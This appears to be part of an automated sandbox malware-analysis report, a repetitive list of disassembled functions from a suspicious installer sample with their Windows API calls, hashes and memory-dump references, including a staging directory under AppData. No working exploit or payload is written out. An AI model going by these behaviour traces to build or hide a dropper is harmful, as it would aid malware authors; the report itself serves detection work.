                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000458000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571901230.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Global$AllocFree
                                                                                                                                                                                                                    • String ID: Call$x(y
                                                                                                                                                                                                                    • API String ID: 3394109436-3442700008
                                                                                                                                                                                                                    • Opcode ID: f905998698a718dc4cf1a42dfb633cd665eb9fc086c23fd15b54cbfec95e9be3
                                                                                                                                                                                                                    • Instruction ID: fc266f0b09462df108d5b450fd3a6dc377bab1f5c412968f7868140de6343470
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f905998698a718dc4cf1a42dfb633cd665eb9fc086c23fd15b54cbfec95e9be3
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4521A572610100EBCB10EB94DEC995E73A9EB49318B25013FF106F32D0DBB9A8519BAD
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00402D44 Relevance: 6.1, APIs: 4, Instructions: 63registryCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571544701.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571620613.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000458000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571901230.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Close$Enum
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 464197530-0
                                                                                                                                                                                                                    • Opcode ID: 783bf1924eaceae6677feedcc5031a151434ee63f91e097ea153fa5b1c868383
                                                                                                                                                                                                                    • Instruction ID: fc7ade2e12cd9e993d25f9a328d8db16c9603ee1eb20de8c24b8f84b94a82c23
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 783bf1924eaceae6677feedcc5031a151434ee63f91e097ea153fa5b1c868383
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B4116A32500109FBDF02AB90CE09FEE7B7DAF54340F100076B904B51E1E7B59E21AB68
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 004015C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00405C3A: CharNextW.USER32(?,?,0042FA50,?,00405CAE,0042FA50,0042FA50,?,?,77573420,004059EC,?,C:\Users\user\AppData\Local\Temp\,77573420,00000000), ref: 00405C48
                                                                                                                                                                                                                      • Part of subcall function 00405C3A: CharNextW.USER32(00000000), ref: 00405C4D
                                                                                                                                                                                                                      • Part of subcall function 00405C3A: CharNextW.USER32(00000000), ref: 00405C65
                                                                                                                                                                                                                    • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                                                                                                                                                                      • Part of subcall function 004057F1: CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405834
                                                                                                                                                                                                                    • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\perula\Tilvirkninger\Jvndgns,?,00000000,000000F0), ref: 0040164D
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\perula\Tilvirkninger\Jvndgns, xrefs: 00401640
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571544701.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571620613.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000458000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571901230.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\perula\Tilvirkninger\Jvndgns
                                                                                                                                                                                                                    • API String ID: 1892508949-3678015398
                                                                                                                                                                                                                    • Opcode ID: 1db21258f9f14eeaa58e626a3877af1e49894c045ef04388b0de34e33f5ae299
                                                                                                                                                                                                                    • Instruction ID: 4927223e19ece6e176e0ab471dddb7e32c8def581d8881840bcbc1854d235eeb
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1db21258f9f14eeaa58e626a3877af1e49894c045ef04388b0de34e33f5ae299
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9711E231504505EBCF30AFA1CD0159F36A0EF14369B29493BFA45B22F1DB3E89519B5E
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00405296 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • IsWindowVisible.USER32(?), ref: 004052C5
                                                                                                                                                                                                                    • CallWindowProcW.USER32(?,?,?,?), ref: 00405316
                                                                                                                                                                                                                      • Part of subcall function 0040427D: SendMessageW.USER32(00000000,00000000,00000000,00000000), ref: 0040428F
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571544701.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571620613.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000458000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571901230.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3748168415-3916222277
                                                                                                                                                                                                                    • Opcode ID: 724b08e39b448c58c7649a37dc1be8b90ebc0ba8e0923a3b5611d97535f2409a
                                                                                                                                                                                                                    • Instruction ID: 81d983181078a42bdaaa38d141d1896fcab4c42a172a92442cc7f35772e796f5
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 724b08e39b448c58c7649a37dc1be8b90ebc0ba8e0923a3b5611d97535f2409a
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8E018431200709EBDF205F51DDD4A5B7B25EB84794F50507BFA00751D0D7BA8C929E2E
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 004024F8 Relevance: 4.5, APIs: 3, Instructions: 47registryCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 0040252B
                                                                                                                                                                                                                    • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 0040253E
                                                                                                                                                                                                                    • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsk21A3.tmp,00000000,00000011,00000002), ref: 00402557
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571544701.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571620613.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000458000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571901230.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Enum$CloseValue
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 397863658-0
                                                                                                                                                                                                                    • Opcode ID: a7693fd32bbd6dda220c639d5c72a78338338ff509cc745735d7ea4ec565f031
                                                                                                                                                                                                                    • Instruction ID: be079dd98ee366e8112d1373a1392f52e75f7f4d5f65991111ca301d6a19f001
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a7693fd32bbd6dda220c639d5c72a78338338ff509cc745735d7ea4ec565f031
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4E018471904204BFEB149F95DE88ABF7ABCEF80358F14403EF505B61D0DAB85E419B69
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00402484 Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,?,?), ref: 004024B5
                                                                                                                                                                                                                    • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsk21A3.tmp,00000000,00000011,00000002), ref: 00402557
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571544701.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571620613.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000458000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571901230.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CloseQueryValue
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3356406503-0
                                                                                                                                                                                                                    • Opcode ID: 28dfcfb9a6f44a18c58c8206a7dfe2bd09e3a5ae6e90a5253dfd418af8ae02c6
                                                                                                                                                                                                                    • Instruction ID: 794a7caf9ed311c3342b46d24488b6d71e3894ac8d4f1441d9e09f9d9ce2e922
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 28dfcfb9a6f44a18c58c8206a7dfe2bd09e3a5ae6e90a5253dfd418af8ae02c6
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A411A731D14205EBDF14DFA4CA585AE77B4EF44348F21843FE445B72C0D6B89A41EB59
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                                                                                                                    • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571544701.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571620613.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000458000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571901230.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3850602802-0
                                                                                                                                                                                                                    • Opcode ID: 819fad79445c3595f7b9f28f54206bfd84f40695cc559c75429dbb5a445ae89f
                                                                                                                                                                                                                    • Instruction ID: eaafb4699c1cdf5c6f59fde68eca766a765a16907ebce13606274643e5ac5f14
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 819fad79445c3595f7b9f28f54206bfd84f40695cc559c75429dbb5a445ae89f
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8D0128316242209FE7095B789D05B6A3698E710715F14463FF851F62F1D678CC429B4C
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0040238E Relevance: 3.0, APIs: 2, Instructions: 39registryCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004023B0
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 004023B9
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571544701.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571620613.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000458000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571901230.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CloseDeleteValue
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2831762973-0
                                                                                                                                                                                                                    • Opcode ID: 49dd4a4acbc57048e4a2cad6fc2e9fcf4131624f7ebcfe3fd0f4b4026ebfb941
                                                                                                                                                                                                                    • Instruction ID: 2791961e855c801182d2f4b3e101f078c994d4f4985963d794b0561754721dd9
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 49dd4a4acbc57048e4a2cad6fc2e9fcf4131624f7ebcfe3fd0f4b4026ebfb941
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E6F09632E045119BE704BBA49B8EABE72A89B44354F29403FFE42F71C1CAF85D41676D
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00401E49 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • ShowWindow.USER32(00000000,00000000), ref: 00401E67
                                                                                                                                                                                                                    • EnableWindow.USER32(00000000,00000000), ref: 00401E72
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571544701.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571620613.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000458000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571901230.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Window$EnableShow
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1136574915-0
                                                                                                                                                                                                                    • Opcode ID: 476e1375ed2ebf99e134ffac4da93d8f4435b4a70c73a61f3ceb60b83f009d87
                                                                                                                                                                                                                    • Instruction ID: 8ee55578b336c0276868c1e88f1fd45be51d25fee0972e3c110634e7b38d832d
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 476e1375ed2ebf99e134ffac4da93d8f4435b4a70c73a61f3ceb60b83f009d87
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8BE01A72E082008FE724ABA5AA495AD77B8EB90325B20847FE211F11D1DA7858419F69
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00406694 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(?,00000020,?,00403401,0000000A), ref: 004066A6
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 004066C1
                                                                                                                                                                                                                      • Part of subcall function 00406624: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040663B
                                                                                                                                                                                                                      • Part of subcall function 00406624: wsprintfW.USER32 ref: 00406676
                                                                                                                                                                                                                      • Part of subcall function 00406624: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 0040668A
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571544701.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571620613.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
